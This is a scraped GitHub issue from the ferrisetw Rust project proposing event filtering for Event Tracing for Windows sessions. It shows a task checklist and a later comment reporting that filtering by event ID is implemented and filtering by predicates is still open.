ferrisetw icon indicating copy to clipboard operation
ferrisetw copied to clipboard

Published 20 hours ago verified publisher icon n4r1b

Implement event filtering

Open n4r1b opened this issue 3 years ago • 1 comments

Info ETW allows filters to be defined for a Provider in a session. MSDN - Defining Filters. KrabsETW already provides a mechanism to do filtering either by events_id or by using more complicated predicates

  • https://github.com/microsoft/krabsetw/tree/master/krabs/krabs/filtering

TODO

  • [ ] Research best way to introduce filters into Ferris
  • [x] Implement a basic filtering based on events_id
  • [ ] Research and implement a filtering based on more complex predicates

n4r1b avatar Jun 02 '21 22:06 n4r1b

We're now able to filter by Event ID.

Predicates are left TODO

daladim avatar Jan 13 '23 16:01 daladim